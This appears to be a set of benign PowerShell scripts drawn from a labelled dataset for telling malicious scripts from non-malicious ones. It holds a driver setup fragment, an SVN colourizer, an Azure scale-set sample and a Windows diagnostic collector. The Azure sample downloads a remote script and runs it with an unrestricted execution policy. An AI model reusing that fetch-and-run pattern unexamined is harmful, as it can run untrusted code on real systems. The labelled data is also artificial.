Write-Host "Setup files doesn't exist.. Exiting.." return "FAIL" } #This API will create the IDD display node and turn off MSFT display path function create_node() { if(Get-Process | Where Name -eq DVServerUMD_Node) { Write-Host "DVServerUMD Process is already running..." return "FAIL" } Write-Host "Creating DVServer UMD node" Start-Process ".\DVServerUMD_Node.exe" -WindowStyle Hidden Start-Sleep -s 3 Write-Host "Turning off MSFT Path" & ".\DVEnabler.exe" if ($LASTEXITCODE -eq 0) { return "SUCCESS" } else { Write-Host "DVEnabler failed. DVServerUMD has not taken over MSBDA!" return "FAIL" } } #This API will execute the setup/run commands function execute_command($param1) { if ( $param1 -eq "setup") { Write-Host "Installing new DVServer UMD driver into the Kernel PnP tree..." pnputil.exe /add-driver DVServer\DVServer.inf /install $ret = create_node if ($ret -eq "FAIL") { return "FAIL" } else { return "SUCCESS" } } if ( $param1 -eq "run") { $ret = create_node if ($ret -eq "FAIL") { return "FAIL" } else { return "SUCCESS" } } } ##Main## $inputval = $param1 $ret = validate_input_params($inputval) if ($ret -eq "FAIL") { Exit } $ret = check_executables if ($ret -eq "FAIL") { Exit } $ret = execute_command($inputval) if ($ret -eq "FAIL") { Exit } Write-Host "Exiting Powershell Script Successfully..."
combined_dataset/train/non-malicious/Colorize Subversion SVN_4.ps1
Colorize Subversion SVN_4.ps1
# detect source control management software function findscm { $scm = '' :selectscm foreach ($_ in @('svn', 'hg')) { $dir = (Get-Location).Path while ($dir.Length -gt 3) { if (Test-Path ([IO.Path]::combine($dir, ".$_"))) { $scm = $_ break selectscm } $dir = $dir -Replace '\\\\[^\\\\]+$', '' } } return $scm } # draw output function drawlines($colors, $cmd) { $scm = findscm if (!$cmd -or !$scm) { return } foreach ($line in (&$scm $cmd)) { $color = $colors[[string]$line[0]] if ($color) { write-host $line -Fore $color } else { write-host $line } } } # svn stat function st { drawlines @{ "A"="Magenta"; "D"="Red"; "C"="Yellow"; "G"="Blue"; "M"="Cyan"; "U"="Green"; "?"="DarkGray"; "!"="DarkRed" } "stat" } # svn update function su { drawlines @{ "A"="Magenta"; "D"="Red"; "U"="Green"; "C"="Yellow"; "G"="Blue"; } "up" } # svn diff function sd { drawlines @{ "@"="Magenta"; "-"="Red"; "+"="Green"; "="="DarkGray"; } "diff" }
combined_dataset/train/non-malicious/830.ps1
830.ps1
$cred = Get-Credential New-AzVmss ` -ResourceGroupName "myResourceGroup" ` -VMScaleSetName "myScaleSet" ` -Location "EastUS2" ` -VirtualNetworkName "myVnet" ` -SubnetName "mySubnet" ` -PublicIpAddressName "myPublicIPAddress" ` -LoadBalancerName "myLoadBalancer" ` -UpgradePolicyMode "Automatic" ` -Credential $cred ` -Zone "1", "2", "3" $publicSettings = @{ "fileUris" = (,"https://raw.githubusercontent.com/Azure-Samples/compute-automation-configurations/master/automate-iis.ps1"); "commandToExecute" = "powershell -ExecutionPolicy Unrestricted -File automate-iis.ps1" } $vmss = Get-AzVmss ` -ResourceGroupName "myResourceGroup" ` -VMScaleSetName "myScaleSet" Add-AzVmssExtension -VirtualMachineScaleSet $vmss ` -Name "customScript" ` -Publisher "Microsoft.Compute" ` -Type "CustomScriptExtension" ` -TypeHandlerVersion 1.8 ` -Setting $publicSettings Update-AzVmss ` -ResourceGroupName "myResourceGroup" ` -Name "myScaleSet" ` -VirtualMachineScaleSet $vmss Get-AzPublicIpAddress -ResourceGroupName "myResourceGroup" | Select IpAddress
combined_dataset/train/non-malicious/sample_4_46.ps1
sample_4_46.ps1
# 2023-02-24 WalterE mod Trap #we# $startTime_AutoAdd = Get-Date trap [Exception]{ WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" } Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Common ---" # version of the psSDP Diagnostic Run-DiagExpression .\DC_NetworkingDiagnostic.ps1 # MSInfo Run-DiagExpression .\DC_MSInfo.ps1 # Obtain pstat output Run-DiagExpression .\DC_PStat.ps1 # CheckSym Run-DiagExpression .\DC_ChkSym.ps1 # AutoRuns Information Run-DiagExpression .\DC_Autoruns.ps1 # Collects Windows Server 2008/R2 Server Manager Information Run-DiagExpression .\DC_ServerManagerInfo.ps1 # List Schedule Tasks using schtasks.exe utility Run-DiagExpression .\DC_ScheduleTasks.ps1 # Collects System and Application Event Logs Run-DiagExpression .\DC_SystemAppEventLogs.ps1 # Collect Machine Registry Information for Setup and Performance Diagnostics Run-DiagExpression .\DC_RegistrySetupPerf.ps1 # GPResults.exe Output Run-DiagExpression .\DC_RSoP.ps1 # Collects information about Driver Verifier (verifier.exe utility) Run-DiagExpression .\DC_Verifier.ps1 # Collects BCD information via BCDInfo tool or boot.ini Run-DiagExpression .\DC_BCDInfo.ps1 # Obtain information about Devices and connections using devcon.exe utility Run-DiagExpression .\DC_Devcon.ps1 # DBErr Data Collector Run-DiagExpression .\DC_DBErr.ps1 # User Rights (privileges) via the userrights.exe tool Run-DiagExpression .\DC_UserRights.ps1 # WhoAmI Run-DiagExpression .\DC_Whoami.ps1 # PoolMon Run-DiagExpression .\DC_PoolMon.ps1 # Collects registry entries for KIR (for 2019) and RBC (for 2016) Run-DiagExpression .\DC_KIR-RBC-RegEntries.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Net ---" # DHCP Client Component Run-DiagExpression .\DC_DhcpClient-Component.ps1 # DNS Client Component Run-DiagExpression .\DC_DNSClient-Component.ps1 # Firewall Run-DiagExpression .\DC_Firewall-Component.ps1 # IPsec Run-DiagExpression .\DC_IPsec-Component.ps1 # NetLBFO Run-DiagExpression .\DC_NetLBFO-Component.ps1 # RPC Run-DiagExpression .\DC_RPC-Component.ps1 # SMB Client Component Run-DiagExpression .\DC_SMBClient-Component.ps1 # SMB Server Component Run-DiagExpression .\DC_SMBServer-Component.ps1 # TCPIP Component Run-DiagExpression .\DC_TCPIP-Component.ps1 # WINSClient Run-DiagExpression .\DC_WINSClient-Component.ps1 # Collects W32Time information Run-DiagExpression .\DC_W32Time.ps1 -LogType "Basic" Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: HyperV ---" # Hyper-V Networking Settings Run-DiagExpression .\DC_HyperVNetworking.ps1 # Hyper-V Network Virtualization Run-DiagExpression .\DC_HyperVNetworkVirtualization.ps1 # Collect the VMGuestSetup.Log file Run-DiagExpression .\DC_VMGuestSetupLogCollector.ps1 # Information about Hyper-V, including Virtual Machine Files and Hyper-V Event Logs Run-DiagExpression .\DC_HyperVFiles.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: DOM ---" # Applied Security Templates Run-DiagExpression .\DC_AppliedSecTempl.ps1 # Collects functional level and local group membership information (DSMisc) Run-DiagExpression .\DC_DSMisc.ps1 # Obtain Netlogon Log Run-DiagExpression .\DC_NetlogonLog.ps1 # Collects NetSetup.Log from %windir%\debug Run-DiagExpression .\DC_NetSetupLog.ps1 # Collects winlogon Log from %windir%\security\logs\winlogon.log Run-DiagExpression .\DC_WinlogonLog.ps1 # Run Repadmin tool with showrepl argument and obtain output Run-DiagExpression .\DC_Repadmin.ps1 # Collects system security settings (INF) via secedit utility Run-DiagExpression .\DC_SystemSecuritySettingsINF.ps1 # Collects registry entries for Directory Services support Run-DiagExpression .\DC_DSRegEntries.ps1 # auditpol output Run-DiagExpression .\DC_AuditPol.ps1 # Kerberos tickets and TGT via klist utility Run-DiagExpression .\DC_KList.ps1 # DCPromo Logs Run-DiagExpression .\DC_DCPromoLogs.ps1 # Determines FSMO role owners Run-DiagExpression .\DC_NetdomFSMO.ps1 # Copies Userenv Log files Run-DiagExpression .\DC_UserenvLogs.ps1 # Collects environment variables (output of SET command) Run-DiagExpression .\DC_EnvVars.ps1 # Collecting Secure Channel Info Run-DiagExpression .\DC_SecureChannelInfo.ps1 # Dfsr Informaton Run-DiagExpression .\DC_DfsrInfo.ps1 # BPA DS if ($Global:skipBPA -ne $true) { Run-DiagExpression .\DC_BPA-DS.ps1 } Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Print ---" # Collect Print Registry Keys Run-DiagExpression .\DC_RegPrintKeys.ps1 # Perf/Printing Event Logs Run-DiagExpression .\DC_PerfPrintEventLogs.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Storage ---" # By adding San.exe to the SDP manifest we should be able to solve cases that have a 512e or Advanced Format (4K) disk in it faster. Run-DiagExpression .\DC_SanStorageInfo.ps1 # Collects Fiber Channel information using fcinfo utility Run-DiagExpression .\DC_FCInfo.ps1 # Obtain information about MS-DOS device names (symbolic links) via DOSDev utility Run-DiagExpression .\DC_DOSDev.ps1 # Collects Information about iSCSI though the iscsicli utility Run-DiagExpression .\DC_ISCSIInfo.ps1 # Parse Storage related event logs on System log using evParse.exe and dump to a HTML file Run-DiagExpression .\DC_EvParser.ps1 # Collects VSS information via VSSAdmin tool Run-DiagExpression .\DC_VSSAdmin.ps1 # Collect Machine Registry Information for Storage Related Diagnostics Run-DiagExpression .\DC_RegistryStorage.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: WinRM ---" # Collects Windows Remote Management Event log Run-DiagExpression .\DC_WinRMEventLogs.ps1 # Collects WSMAN and WinRM binary details info Run-DiagExpression .\DC_WSMANWinRMInfo.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Update ---" # Update History Run-DiagExpression .\DC_UpdateHistory.ps1 # Collect WindowsUpdate.Log Run-DiagExpression .\DC_WindowsUpdateLog.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Cluster ---" # Export cluster resources properties to a file (2K8 R2 and newer) Run-DiagExpression .\DC_ClusterResourcesProperties.ps1 # Collects Cluster Groups Resource Dependency Report (Win2K8R2) Run-DiagExpression .\DC_ClusterDependencyReport.ps1 # Collects Cluster - related Event Logs for Cluster Diagnostics Run-DiagExpression .\DC_ClusterEventLogs.ps1 # Collects \windows\cluster\reports contents (MHT, XML and Validate*.LOG) Run-DiagExpression .\DC_ClusterReportsFiles.ps1 # Collects Cluster - related registry keys Run-DiagExpression .\DC_RegistryCluster.ps1 # Information about Windows 2008 R2 Cluster Shared Volumes Run-DiagExpression .\DC_CSVInfo.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Performance Data ---" # Performance Monitor - System Performance Data Collector Run-DiagExpression .\TS_PerfmonSystemPerf.ps1 -NumberOfSeconds 60 -DataCollectorSetXMLName "SystemPerformance.xml" Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Remote ---" # ServerCore R2 Setup #Run-DiagExpression .\DC_ServerCoreR2Setup.ps1 # NetworkAdapters Run-DiagExpression .\DC_NetworkAdapters-Component.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase: Done ---" Write-Host "...Next step: Troubleshooting section, if it hangs, run script with parameter SkipTS" if ($Global:skipTS -ne $true) { Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_common ---" Run-DiagExpression .\TS_DumpCollector.ps1 -CopyWERMinidumps -CopyMachineMiniDumps -MaxFileSize 300 -CopyMachineMemoryDump # Detects and alerts evaluation media Run-DiagExpression .\TS_EvalMediaDetection.ps1 # Debug/GFlags check Run-DiagExpression .\TS_DebugFlagsCheck.ps1 # Information about Processes resource usage and top Kernel memory tags Run-DiagExpression .\TS_ProcessInfo.ps1 # RC_32GBMemoryKB2634907 Run-DiagExpression .\RC_32GBMemoryKB2634907.ps1 # Checking if Registry Size Limit setting is present on the system Run-DiagExpression .\TS_RegistrySizeLimitCheck.ps1 # Running powercfg.exe to obtain power settings information Run-DiagExpression .\TS_PowerCFG.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Net ---" # Check for ephemeral port usage Run-DiagExpression .\TS_PortUsage.ps1 # RC_KB2647170_CnameCheck Run-DiagExpression .\RC_KB2647170_CnameCheck.ps1 # FirewallCheck Run-DiagExpression .\RC_FirewallCheck.ps1 # IPv66To4Check Run-DiagExpression .\RC_IPv66To4Check.ps1 # RC_HTTPRedirectionTSGateway Run-DiagExpression .\RC_HTTPRedirectionTSGateway.ps1 # [Idea ID 6530] [Windows] Check for any configured RPC port range which may cause issues with DCOM or DTC components Run-DiagExpression .\TS_RPCPortRangeCheck.ps1 # [Idea ID 2387] [Windows] Verify if RPC connection a configured to accept only Authenticated sessions Run-DiagExpression .\TS_RPCUnauthenticatedSessions.ps1 # SMB2ClientDriverStateCheck Run-DiagExpression .\TS_SMB2ClientDriverStateCheck.ps1 # SMB2ServerDriverStateCheck Run-DiagExpression .\TS_SMB2ServerDriverStateCheck.ps1 # Opportunistic Locking has been disabled and may impact performance. Run-DiagExpression .\TS_LockingKB296264Check.ps1 # Evaluates whether InfocacheLevel should be increased to 0x10 hex. To resolve slow logon, slow boot issues. Run-DiagExpression .\TS_InfoCacheLevelCheck.ps1 # RSASHA512 Certificate TLS 1.2 Compat Check Run-DiagExpression .\TS_DetectSHA512-TLS.ps1 # IPv6Check Run-DiagExpression .\TS_IPv6Check.ps1 # PMTU Check Run-DiagExpression .\TS_PMTUCheck.ps1 # Checks for modified TcpIP Reg Parameters and recommend KB Run-DiagExpression .\TS_TCPIPSettingsCheck.ps1 # 'Checks if the number of 6to4 adapters is larger than the number of physical adapters Run-DiagExpression .\TS_AdapterKB980486Check.ps1 # Checks files in the LanmanServer, if any at .PST files a file is created with listing all of the files in the directory Run-DiagExpression .\TS_NetFilePSTCheck.ps1 # Checks if Windows Server 2008 R2 SP1, Hyper-V, and Tunnel.sys driver are installed if they are generate alert Run-DiagExpression .\TS_ServerCoreKB978309Check.ps1 # DetectLowPathMTU #_# Run-DiagExpression .\TS_DetectLowPathMTU.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_HyperV ---" # Hyper-V Info 2008R2 Run-DiagExpression .\TS_HyperVInfo.ps1 # Detect Virtualization Run-DiagExpression .\TS_Virtualization.ps1 if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\Hyper-V) { # Hyper-V BPA if ($Global:skipBPA -ne $true) { Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/Hyper-V" -OutputFileName ($Computername + "_HyperV_BPAInfo.HTM") -ReportTitle "Hyper-V Best Practices Analyzer" } } # [Idea ID 6134] [Windows] You cannot start Hyper-V virtual machines after you enable the IO verification option on a HyperV Run-DiagExpression .\TS_HyperVCheckVerificationKB2761004.ps1 # Check for event ID 21203 or 21125 Run-DiagExpression .\TS_CheckEvtID_KB2475761.ps1 # [Idea ID 5438] [Windows] Windows 2012 Hyper-V SPN and SCP not registed if customer uses a non default dynamicportrange Run-DiagExpression .\TS_HyperVEvent14050Check.ps1 # [Idea ID 5752] [Windows] BIOS update may be required for some computers before starting Hyper-V on 2012 Run-DiagExpression .\TS_HyperV2012-CS-BIOS-Check.ps1 # Hyper-V KB 982210 check Run-DiagExpression .\TS_HyperVSCSIDiskEnum.ps1 # Hyper-V KB 975530 check (Xeon Processor Errata) Run-DiagExpression .\TS_HyperVXeon5500Check.ps1 # Checks if Windows Server 2008 R2 SP1, Hyper-V, and Hotfix 2263829 are installed if they are generate alert Run-DiagExpression .\TS_HyperVKB2263829Check.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_DOM ---" # DCDiag information Run-DiagExpression .\TS_DCDiag.ps1 # Check AD Replication Status Run-DiagExpression .\TS_ADReplCheck.ps1 # Checks if CrashOnAuditFail is either 1 or 2 Run-DiagExpression .\TS_CrashOnAuditFailCheck.ps1 # SYSVOL and/or NETLOGON shares are missing on domain controller Run-DiagExpression .\TS_LSASSHighCPU.ps1 # SYSVOL and/or NETLOGON shares are missing on domain controller Run-DiagExpression .\TS_SysvolNetLogonShareCheck.ps1 # Missing Rid Set reference attribute detected Run-DiagExpression .\TS_ADRidSetReferenceCheck.ps1 # AD Integrated DNS Server should not point only to itself if it has replica partners. Run-DiagExpression .\TS_DCCheckDnsExclusiveToSelf.ps1 # [Idea ID 3768] [Windows] New rule to verify USN Roll Back Run-DiagExpression .\TS_USNRollBackCheck.ps1 # [Idea ID 2882] [Windows] The stop of Intersite Messaging service on ISTG causes DFSN cannot calculate site costs Run-DiagExpression .\TS_IntersiteMessagingStateCheck.ps1 # [Idea ID 2831] [Windows] DFSR Reg setting UpdateWorkerThreadCount = 64 may cause hang Run-DiagExpression .\TS_DfsrUpdateWorkerThreadCountCheck.ps1 # [Idea ID 2593] [Windows] UDP 389 on DC does not respond Run-DiagExpression .\TS_IPv6DisabledonDCCheck.ps1 # [Idea ID 4724] [Windows] W32Time and time skew Run-DiagExpression .\TS_Win32TimeTimeSkewRegCheck.ps1 # [Idea ID 4796] [Windows] MaxConcurrentApi Problem Detection Lite Run-DiagExpression .\TS_MCALite.ps1 # [Idea ID 5009] [Windows] Weak Key Block Detection Run-DiagExpression .\TS_DetectWeakKeys.ps1 # [Idea ID 6816] [Windows] Detect Certificate Root Store Size Problems Run-DiagExpression .\TS_DetectRootSize.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Print ---" # Print Information Report Run-DiagExpression .\TS_PrintInfo.ps1 # [KSE Rule] [ Windows V3] Presence of lots of folders inside \spool\prtprocs\ causes failure to install print queues Run-DiagExpression .\TS_PrtprocsSubfolderBloat.ps1 # Checks if machine is server 2008 R2 sp0 or sp1, and event log 602 exists, and hotfix kb 2457866 is installed if true generate alert Run-DiagExpression .\TS_PrinterKB2457866Check.ps1 # Checks if a Kyocera print driver is installed then checks if KB982728 is installed Run-DiagExpression .\TS_PrinterKB982728Check.ps1 # Checks if Point and Print Restriction Policy and then look for specifc events on event logs Run-DiagExpression .\TS_PrinterKB2618460Check.ps1 # Checks to see if HP Standard TCP/IP Port key is present on the system Run-DiagExpression .\TS_PrintingHPTCPMonCheck.ps1 # Checking if 'Net Driver HPZ12' or 'Pml Driver HPZ12' is one of the installed services and startup type is something different than Disabled Run-DiagExpression .\TS_HPZ12ServiceCheck.ps1 # Detect the OEM HP driver hpzui4wm.DLL Run-DiagExpression .\TS_PrintHpzui4wmCheck.ps1 # Check for the presence of Zenographics Device Manager User Interface Run-DiagExpression .\TS_Check_ZenographicsUI.ps1 # Check for upgrade from HP UPD 5.2 to 5.3 Run-DiagExpression .\TS_2628581_HPUPDUpgrade.ps1 # [Idea ID 2226] [Windows] Old SHD and SPL files residual in the Spool directory cause issues Run-DiagExpression .\TS_PrintSpoolerOldSPLSHD.ps1 # [Idea ID 1872] [Windows] Detecting bloated HKEY_USERS\.default\printers\Devmodes2 registry key on Terminal servers Run-DiagExpression .\TS_PrintDevModes2CountCheck.ps1 # [Idea ID 3462] [Windows] Printing issue - multiple SETxnnn.tmp files Run-DiagExpression .\TS_PrintSetTMPSystem32Check.ps1 # [Idea ID 4091] [Windows] frequent spooler crash due to zsdnt5ui.dll Run-DiagExpression .\TS_PrintZSDDMUICheck.ps1 # [Idea ID 4168] [Windows] Check for existence of 2647753 for printing issues Run-DiagExpression .\TS_Win7PrintUpdateRollupCheck.ps1 # [Idea ID 2374] [Windows] Spooler service hangs since CSR exhausts the 512 threads in thread pool Run-DiagExpression .\TS_PrintCSRBloatingCheck.ps1 # [Idea ID 4805] [Windows] Printers show Offline on Windows 7 clients Run-DiagExpression .\TS_PrinterShowOffline.ps1 # [Idea ID 5470] [Windows] GPP printer fails to add with error code 0x80070704 Run-DiagExpression .\TS_GPPDeployPrinterCheck.ps1 # [Idea ID 6863] [Windows] GPP printer fails to be added since LocalEnumForms returns error 8007007a Run-DiagExpression .\TS_GPPMapPrinterKB2797136.ps1 # [KSE Rule] [ Windows V3] HKCU\Software\Hewlett-Packard registry hive increases in size on Citrix servers Run-DiagExpression .\TS_HPPrinterDriverVersionCheck.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_RDP ---" # Checking the presence of Citrix AppSense 8.1 Run-DiagExpression .\TS_CitrixAppSenseCheck.ps1 # Check for large number of Inactive Terminal Server ports Run-DiagExpression .\TS_KB2655998_InactiveTSPorts.ps1 # [Idea ID 2285] [Windows] Windows Server 2003 TS Licensing server does not renew new versions of TS Per Device CALs Run-DiagExpression .\TS_RemoteDesktopLServerKB2512845.ps1 if (test-path $env:Windir\System32\BestPractices\v1.0\Models\Microsoft\Windows\TerminalServices) { # BPA RDP if ($Global:skipBPA -ne $true) { Run-DiagExpression .\TS_BPAInfo.ps1 -BPAModelID "Microsoft/Windows/TerminalServices" -OutputFileName ($Computername + "_TS_BPAInfo.HTM") -ReportTitle "Terminal Services Best Practices Analyzer" } } Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Storage ---" # Detect 4KB Drives (Disk Sector Size) Run-DiagExpression .\TS_DriveSectorSizeInfo.ps1 # [Idea ID 7345] [Windows] Perfmon - Split IO Counter Run-DiagExpression .\TS_DetectSplitIO.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Setup ---" # [Idea ID 1911] [Windows] NTFS metafile cache consumes most of RAM in Win2k8R2 Server Run-DiagExpression .\TS_NTFSMetafilePerfCheck.ps1 # [Idea ID 2346] [Windows] high cpu only on one processor Run-DiagExpression .\TS_2K3ProcessorAffinityMaskCheck.ps1 # [Idea ID 3989] [Windows] STACK MATCH - Win2008R2 - Machine hangs after shutdown, caused by ClearPageFileAtShutdown setting Run-DiagExpression .\TS_SBSLClearPageFileAtShutdown.ps1 # [Idea ID 2753] [Windows] HP DL385 G5p machine cannot generate dump file Run-DiagExpression .\TS_ProLiantDL385NMICrashDump.ps1 # [Idea ID 3253] [Windows] Windows Search service does not start immediately after the machine is booted Run-DiagExpression .\TS_WindowsSearchLenovoRapidBootCheck.ps1 # [Idea ID 2334] [Windows] W2K3 x86 SP2 server running out of paged pool due to D2d tag Run-DiagExpression .\TS_KnownKernelTags.ps1 # [Idea ID 3317] [Windows] DisableEngine reg entry can cause app install or registration failure Run-DiagExpression .\TS_AppCompatDisabledCheck.ps1 # [Idea ID 2357] [Windows] the usage of NPP is very large for XTE.exe Run-DiagExpression .\TS_XTENonPagedPoolCheck.ps1 # [Idea ID 4368] [Windows] Windows Logon Slow and Explorer Slow Run-DiagExpression .\TS_2K3CLSIDUserACLCheck.ps1 # [Idea ID 4649] [Windows] Incorrect values for HeapDecomitFreeBlockThreshold causes high Private Bytes in multiple processes Run-DiagExpression .\TS_HeapDecommitFreeBlockThresholdCheck.ps1 # [Idea ID 2056] [Windows] Consistent Explorer crash due to wsftpsi.dll #_# Run-DiagExpression .\TS_WsftpsiExplorerCrashCheck.ps1 # [Idea ID 3250] [Windows] Machine exhibits different symptoms due to Confliker attack Run-DiagExpression .\TS_Netapi32MS08-067Check.ps1 # [Idea ID 5194] [Windows] Unable to install vcredist_x86.exe with message (Required file install.ini not found. Setup will now exit) Run-DiagExpression .\TS_RegistryEntryForAutorunsCheck.ps1 # [Idea ID 5452] [Windows] The “Red Arrow” issue in Component Services caused by registry keys corruption Run-DiagExpression .\TS_RedArrowRegistryCheck.ps1 # [Idea ID 5603] [Windows] Unable to start a service due to corruption in the Event Log key Run-DiagExpression .\TS_EventLogServiceRegistryCheck.ps1 # [Idea ID 4783] [Windows] eEye Digital Security causing physical memory depletion Run-DiagExpression .\TS_eEyeDigitalSecurityCheck.ps1 # [Idea ID 5091] [Windows] Super Rule-To check if both 3GB and PAE switch is present in boot.ini for a 32bit OS (Pre - Win 2k8) Run-DiagExpression .\TS_SwithesInBootiniCheck.ps1 # [Idea ID 7018] [Windows] Event Log Service won't start Run-DiagExpression .\TS_EventLogStoppedGPPCheck.ps1 # [Idea ID 8012] [Windows] SDP-UDE check for reg key DisablePagingExecutive Run-DiagExpression .\TS_DisablePagingExecutiveCheck.ps1 # [KSE Rule] [ Windows V3] Server Manager refresh issues and SDP changes reqd for MMC Snapin Issues in 2008, 2008 R2 Run-DiagExpression .\TS_ServerManagerRefreshKB2762229.ps1 # [KSE Rule] [ Windows V3] Handle leak in Svchost.exe when a WMI query is triggered by using the Win32_PowerSettingCapabilities Run-DiagExpression .\TS_WMIHandleLeakKB2639077.ps1 # Checks 32 bit windows server 2003 / 2008 to see is DEP is disabled, if so it might not detect more than 4 GB of RAM. Run-DiagExpression .\TS_DEPDisabled4GBCheck.ps1 # [Idea ID 2695] [Windows] Check the Log On account for the Telnet service to verify it's not using the Local System account Run-DiagExpression .\TS_TelnetSystemAccount.ps1 # [Idea ID 2389] [Windows] Hang caused by kernel memory depletion due 'SystemPages' reg key with wrong value Run-DiagExpression .\TS_MemoryManagerSystemPagesCheck.ps1 # [Idea ID 3474] [Windows] Pending Trans Rule - PendingXmlIdentifier, NextQueueEntryIndex, AdvancedInstallersNeedResolving Run-DiagExpression .\TS_ServicingComponentsReg.ps1 # [Idea ID 3472] [Windows] Pending Transactions Rule Idea - Pending.xml Run-DiagExpression .\TS_ServicingPendingXml.ps1 # [Idea ID 5712] [Windows] Run Dism checkhealth on Win8 or 2012 to detect possible servicing corruption Run-DiagExpression .\TS_ServicingCorruptionCheck.ps1 # [Idea ID 1922] [Windows] On Windows 2008 R2 and Windows 7 System state backup fails with event id 5 and error 2155347997 Run-DiagExpression .\TS_BackupSystemStateKB2182466.ps1 # [Idea ID 3059] [Windows] Ntbackup high CPU and hang Run-DiagExpression .\TS_FilesNotToBackup2K3Check.ps1 # [Idea ID 2004] [Windows] Bitlocker Drive Preparation fails with Error 'The new active drive cannot be formatted.' Run-DiagExpression .\TS_BitlockerDenyWriteFixedPolicy.ps1 # [Idea ID 6711] [Windows] MSI package fails to install with error code HRESULT -2147319780 Run-DiagExpression .\TS_MSIPackageInstallationCheck.ps1 # [Idea ID 3002] [Windows] SP1 installation on Windows 7 and Windows Server 2008 R2 fails with the error 0x800F0826 Run-DiagExpression .\TS_UsbstorSystemPermissionsSPCheck.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_WinRM ---" # Check if hotfix 2480954 installed Run-DiagExpression .\TS_KB2480954AndWinRMStateCheck.ps1 Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Cluster ---" if ($Global:skipTScluster -ne $true) { # FailoverCluster Cluster Name Object AD check Run-DiagExpression .\TS_ClusterCNOCheck.ps1 # [Idea ID 2169] [Windows] Xsigo network host driver can cause Cluster disconnects Run-DiagExpression .\TS_ClusterXsigoDriverNetworkCheck.ps1 # [Idea ID 2251] [Windows] Cluster 2003 - Access denied errors during a join, heartbeat, and Cluster Admin open Run-DiagExpression .\TS_Cluster2K3NoLmHash.ps1 # [Idea ID 2513] [Windows] IPv6 rules for Windows Firewall can cause loss of communications between cluster nodes Run-DiagExpression .\TS_ClusterIPv6FirewallCheck.ps1 # [Idea ID 5258] [Windows] Identifying Cluster Hive orphaned resources located in the dependencies key Run-DiagExpression .\TS_Cluster_OrphanResource.ps1 # [Idea ID 6519] [Windows] Invalid Class error on 2012 Clusters (SDP) Run-DiagExpression .\TS_ClusterCAUWMINamespaceCheck.ps1 # [Idea ID 6500] [Windows] Invalid Namespace error on 2008 and 2012 Clusters Run-DiagExpression .\TS_ClusterMSClusterWMINamespaceCheck.ps1 # Cluster Validation Report Troubleshooter Run-DiagExpression .\TS_ClusterValidationTests.ps1 } Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_3rd party ---" # [Idea ID 7521] [Windows] McAfee HIPS 7.0 adds numerous extraneous network adapter interfaces to registry Run-DiagExpression .\TS_McAfeeHIPS70Check.ps1 # [Idea ID 986] [Windows] SBSL McAfee 